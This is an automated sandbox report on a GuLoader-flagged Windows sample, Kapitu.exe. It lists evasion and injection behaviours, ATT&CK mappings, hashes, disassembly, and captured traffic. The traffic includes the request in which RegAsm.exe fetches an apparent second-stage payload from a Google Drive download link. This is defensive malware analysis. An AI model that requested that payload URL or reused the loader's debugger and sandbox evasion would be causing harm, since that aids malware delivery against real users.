        Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmpBinary or memory string: Progmanlock

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion22Input Capture1Security Software Discovery311Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection112LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1364 Sample: Kapitu.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 84 19 prda.aadg.msidentity.com 2->19 21 drive.google.com 2->21 25 Found malware configuration 2->25 27 Multi AV Scanner detection for submitted file 2->27 29 Yara detected GuLoader 2->29 31 2 other signatures 2->31 8 Kapitu.exe 1 2->8         started        signatures3 process4 signatures5 33 Writes to foreign memory regions 8->33 35 Tries to detect Any.run 8->35 37 Hides threads from debuggers 8->37 11 RegAsm.exe 13 8->11         started        process6 dnsIp7 23 drive.google.com 142.250.186.110, 443, 49788 GOOGLEUS United States 11->23 39 Tries to detect Any.run 11->39 41 Hides threads from debuggers 11->41 15 WerFault.exe 22 16 11->15         started        17 conhost.exe 11->17         started        signatures8 process9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Kapitu.exe20%VirustotalBrowse
        Kapitu.exe9%ReversingLabsWin32.Trojan.Mucc

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://watson.telemet0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		142.250.186.110
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://drive.google.com/RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmpfalse
            		high
            https://drive.google.com/_aRegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmpfalse
              		high
              https://watson.telemetWerFault.exe, 00000014.00000003.19075440404.000000000306F000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              142.250.186.110
              		drive.google.comUnited States
              		15169GOOGLEUSfalse

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:1364
              Start date:27.09.2021
              Start time:15:06:05
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:Kapitu.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Run name:Suspected Instruction Hammering
              Number of analysed new started processes analysed:22
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal84.troj.evad.winEXE@5/4@1/1
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 60%
              • Number of executed functions: 10
              • Number of non-executed functions: 11
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.54.122.82, 51.105.236.244, 20.82.210.154, 52.109.12.18, 40.126.31.8, 20.190.159.134, 40.126.31.139, 40.126.31.141, 40.126.31.137, 20.190.159.138, 40.126.31.1, 20.190.159.132, 104.208.16.94
              • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, arc.msn.com, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, onedsblobprdcus16.centralus.cloudapp.azure.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              15:08:49API Interceptor1x Sleep call for process: RegAsm.exe modified
              15:12:58API Interceptor1x Sleep call for process: WerFault.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              37f463bf4616ecd445d4a1937da06e19SebwAujas5.exeGet hashmaliciousBrowse
              • 142.250.186.110
              nxW9yUgdYM.exeGet hashmaliciousBrowse
              • 142.250.186.110
              Payment_Advice.exeGet hashmaliciousBrowse
              • 142.250.186.110
              cxBR3cCGTw.exeGet hashmaliciousBrowse
              • 142.250.186.110
              k5THcVgINl.exeGet hashmaliciousBrowse
              • 142.250.186.110
              b2i2IopgOC.exeGet hashmaliciousBrowse
              • 142.250.186.110
              G2BPn4a7o1.exeGet hashmaliciousBrowse
              • 142.250.186.110
              Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
              • 142.250.186.110
              qOsCIQD1uR.exeGet hashmaliciousBrowse
              • 142.250.186.110
              NC7bm1PoKj.exeGet hashmaliciousBrowse
              • 142.250.186.110
              p0FDRanFUE.exeGet hashmaliciousBrowse
              • 142.250.186.110
              Tt5xbxWwsb.exeGet hashmaliciousBrowse
              • 142.250.186.110
              rJPkGz9DpL.exeGet hashmaliciousBrowse
              • 142.250.186.110
              GVXEsDOGHX.exeGet hashmaliciousBrowse
              • 142.250.186.110
              IAWCl9VgWq.exeGet hashmaliciousBrowse
              • 142.250.186.110
              BRl35oWria.exeGet hashmaliciousBrowse
              • 142.250.186.110
              UcmKadhoIn.exeGet hashmaliciousBrowse
              • 142.250.186.110
              oGLE7fjvYA.exeGet hashmaliciousBrowse
              • 142.250.186.110
              ZbhUS5doEw.exeGet hashmaliciousBrowse
              • 142.250.186.110
              dEYSAsBcE8.exeGet hashmaliciousBrowse
              • 142.250.186.110

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_8e77c7606944d14a4a77d55b81e0b269ca1184a3_e9e275a3_cbb8e5b7-b486-4e03-a377-23ec05ba81b4\Report.wer
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):14174
              Entropy (8bit):3.7659925989635616
              Encrypted:false
              SSDEEP:192:0oLiCb1o4zmSaAa403TaU5QPmRtDu76MfAIO8ErPM:a0olSaA4aU++tDu76MfAIO8wPM
              MD5:DA404030CE19F1BBA13D8E4E56253CE9
              SHA1:C5AA9F42085D9805EE411E8482CA3AB8731E6A29
              SHA-256:F5B6655BF5F0FA7CBF328A83AFBA3BAEB22635B5F964C28FA9DFBFD2A9842EBE
              SHA-512:25EE3FEB9BCEF83B3771A591C4A89BCBAC54B6952E0ADFF9E33C14142596DEDE98476354BA821D6F59C11EC6A125EF43D623DF2BFC819FB8B7E4AA8F47B24285
              Malicious:false
              Reputation:low
              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.2.5.5.7.3.4.1.6.3.1.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.2.5.5.7.5.5.0.9.5.8.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.b.8.e.5.b.7.-.b.4.8.6.-.4.e.0.3.-.a.3.7.7.-.2.3.e.c.0.5.b.a.8.1.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.0.c.3.3.6.a.-.e.0.9.2.-.4.d.2.9.-.b.0.9.6.-.3.d.f.3.9.2.a.5.e.8.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.3.c.-.0.0.0.1.-.0.0.1.0.-.7.0.1.8.-.9.2.2.2.a.9.b.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.e.e.8.b.2.5.7.3.f.7.1.e.8.d.5.c.3.e.e.7.e.5.3.a.f.3.e.6.7.7.2.e.0.9.0.d.0.f.3.!.
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERECCC.tmp.dmp
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Mon Sep 27 14:12:54 2021, 0x1205a4 type
              Category:dropped
              Size (bytes):77274
              Entropy (8bit):2.1873454119378852
              Encrypted:false
              SSDEEP:192:b97zc1lXfM++84XRr9WCgyDv6W/GCpjYRz7An5N2aKf3hHddI+ha6GaBPXuwHY7r:b938G+3G9WCPGCWywhfDiZ8PtHY7Kg
              MD5:92E5E849DE9B165B358CAB49E4379A1D
              SHA1:71D4200030C91F2E1973A99279A2E8B0CE9BAC4D
              SHA-256:76655AEE6B2EA0D2870503F7101E7BE88159FBC194032E6411400C1EAE11CE69
              SHA-512:80C686D44CE6D6238723BC082AFDAE7BC9584C0C071559877988615FBF8DF42C727C593C56EF27B4AF49AEB1F2C0CC7181CA3D69850F42710340A52D40B7AA6C
              Malicious:false
              Reputation:low
              Preview: MDMP..a..... .......f.Qa..............................bJ.......(......GenuineIntel...........T.......<...X.Qa.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.9.0.4.1...5.4.6.....................................................................................................
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF180.tmp.WERInternalMetadata.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):6364
              Entropy (8bit):3.726221093864917
              Encrypted:false
              SSDEEP:96:R7IU6o7lZt3i0t6QszTYzxXTiIqw4f1OvzcuujulBZaMQUm89bIIsfztGm:R9l7lZNi0t6pYzlN4aBpDm89bIIsfzYm
              MD5:BF0431B1450429DE61AAE2F1227D870F
              SHA1:016A4DBACFB52275E9787D6C6D7580610BB98D12
              SHA-256:958FE7FAF707624A01978864515EA9E09865F753BF00A2D9E7E2DEDCFF4AF9B5
              SHA-512:66DCF438B84C50761DFAE34DB12C3001D133B05B670E6B52DDFA7406ABC0C0EC787B269C8BA38E4633274767010E6BC2867F02D54D8766E5AFCBDA753771CB54
              Malicious:false
              Reputation:low
              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.7.2.<./.P.i.
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF24C.tmp.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4831
              Entropy (8bit):4.517021049579082
              Encrypted:false
              SSDEEP:48:cvIwwtl8zs/WEe702I7VFJ5WS2CfjkKs3rm8M4JfuDmgOqF0+q8oBXvOR5/ELu8W:uILf/Wp7GySPf8Jfufgv1y5au84u8rd
              MD5:7334475FBAF6479D83C63961C74E9137
              SHA1:F0F3F7A43259C96EAA73960FB4C8C1CB7366713F
              SHA-256:40677DF1FFD16F49BE05D49D4384B0172698E853CCD8A7D2C98D4844EFDAE91F
              SHA-512:411A48956C1EDBBB1184BA856A7F4F32AFB8D4FAD43EE075FF19588D281F702118E63B6519B49B8CA8A371529C9A488963B7419A6836F8E0EFE47EACF2DA0CA5
              Malicious:false
              Reputation:low
              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221284375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.2510687218535645
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Kapitu.exe
              File size:102400
              MD5:149b6bd6b0d3dd2b0fbb111632d59fcc
              SHA1:33cdaa42e1a5c1fad1aa4f38dd9ad6ea75113aa7
              SHA256:b622dbe802148305104ef456835748d2fc0d8edeffa64787c43c78bcb1914b2f
              SHA512:d2783ef1112d892b9501cf0e8ce6e74277d0d55d0eb9cd3841802381682bc1e7631389c24a2f6f297a82f406fdb6c942ae7987df96f227d00e73ebbc6d01c51f
              SSDEEP:1536:RMigxMWRwt1aaGhFNEAAF9vq/eVlQ4F5kOrpdh/:aicCQhFWfFqWlQa19d1
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L......G.................P...0...............`....@................

              File Icon

              Icon Hash:78f8d6d4ac88d0e2

              Static PE Info

              General

              Entrypoint:0x4012d4
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x47939ED5 [Sun Jan 20 19:19:49 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:1eb0aaa4f15bbd841e91215ce68e26d2

              Entrypoint Preview

              Instruction
              push 00413AA8h
              call 00007F1AD0652725h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              cmp byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              scasd
              cmp dword ptr [eax], esi
              fmulp st(7), st(0)
              and eax, 3D1FA54Eh
              inc edi
              push cs
              pop edx
              cmp bh, byte ptr [ebx+00000000h]
              add byte ptr [eax], al
              add dword ptr [eax], eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              loopne 00007F1AD065271Ah
              inc edx
              add dl, byte ptr [ebx+54h]
              push esi
              push ebx
              push ebp
              add byte ptr [ecx+00h], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              dec esp
              xor dword ptr [eax], eax
              add dword ptr [esi+eax*8], esp
              cwde
              outsb
              pop esp

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x151740x28.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1cb8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
              IMAGE_DIRECTORY_ENTRY_IAT0x10000xdc.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x145480x15000False0.564581008185data6.64813091297IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .data0x160000x9f40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc0x170000x1cb80x2000False0.264526367188data3.48286092723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              CUSTOM0x18b7a0x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
              CUSTOM0x185fc0x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
              CUSTOM0x1807e0x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
              CUSTOM0x17f400x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
              RT_ICON0x178d80x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 252, next used block 65280
              RT_ICON0x175f00x2e8data
              RT_ICON0x174c80x128GLS_BINARY_LSB_FIRST
              RT_GROUP_ICON0x174980x30data
              RT_VERSION0x172300x268MS Windows COFF Motorola 68000 object fileEnglishUnited States

              Imports

              DLLImport
              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

              Version Infos

              DescriptionData
              Translation0x0409 0x04b0
              InternalNameKapitu
              FileVersion1.00
              CompanyNameCelRox
              CommentsCelRox
              ProductNameCelRox
              ProductVersion1.00
              FileDescriptionCelRox
              OriginalFilenameKapitu.exe

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2021 15:08:50.402720928 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.402801037 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.402980089 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.418245077 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.418298006 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.472126961 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.472280025 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.472311974 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.472326040 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.475087881 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.475250959 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.589153051 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.589210033 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.589917898 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.590042114 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.592343092 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.633951902 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.844346046 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.844538927 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.844599009 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.844757080 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.844803095 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.844964981 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.845010996 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.845056057 CEST44349788142.250.186.110192.168.11.20
              Sep 27, 2021 15:08:50.845187902 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.852526903 CEST49788443192.168.11.20142.250.186.110
              Sep 27, 2021 15:08:50.852603912 CEST44349788142.250.186.110192.168.11.20

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2021 15:07:53.744065046 CEST6466553192.168.11.201.1.1.1
              Sep 27, 2021 15:07:53.753231049 CEST53646651.1.1.1192.168.11.20
              Sep 27, 2021 15:07:53.879187107 CEST5209053192.168.11.201.1.1.1
              Sep 27, 2021 15:07:54.025373936 CEST53520901.1.1.1192.168.11.20
              Sep 27, 2021 15:08:44.178517103 CEST4924153192.168.11.201.1.1.1
              Sep 27, 2021 15:08:44.186928034 CEST53492411.1.1.1192.168.11.20
              Sep 27, 2021 15:08:50.381459951 CEST6335753192.168.11.201.1.1.1
              Sep 27, 2021 15:08:50.390096903 CEST53633571.1.1.1192.168.11.20
              Sep 27, 2021 15:12:36.681036949 CEST5966753192.168.11.201.1.1.1
              Sep 27, 2021 15:12:36.690148115 CEST53596671.1.1.1192.168.11.20
              Sep 27, 2021 15:12:57.097088099 CEST6036053192.168.11.201.1.1.1
              Sep 27, 2021 15:12:57.105799913 CEST53603601.1.1.1192.168.11.20
              Sep 27, 2021 15:12:58.214167118 CEST5431853192.168.11.201.1.1.1
              Sep 27, 2021 15:12:58.223273993 CEST53543181.1.1.1192.168.11.20

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Sep 27, 2021 15:08:50.381459951 CEST192.168.11.201.1.1.10xab1dStandard query (0)drive.google.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Sep 27, 2021 15:08:50.390096903 CEST1.1.1.1192.168.11.200xab1dNo error (0)drive.google.com142.250.186.110A (IP address)IN (0x0001)
              Sep 27, 2021 15:12:57.105799913 CEST1.1.1.1192.168.11.200x3e86No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

              HTTP Request Dependency Graph

              • drive.google.com

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.11.2049788142.250.186.110443C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
              TimestampkBytes transferredDirectionData
              2021-09-27 13:08:50 UTC0OUTGET /uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: drive.google.com
              Cache-Control: no-cache
              2021-09-27 13:08:50 UTC0INHTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              x-chromium-appcache-fallback-override: disallow-fallback
              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
              Content-Security-Policy: script-src 'nonce-MvTTUjqOi+ULm6tB1JBGlA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
              Date: Mon, 27 Sep 2021 13:08:50 GMT
              Expires: Mon, 27 Sep 2021 13:08:50 GMT
              Cache-Control: private, max-age=0
              X-Content-Type-Options: nosniff
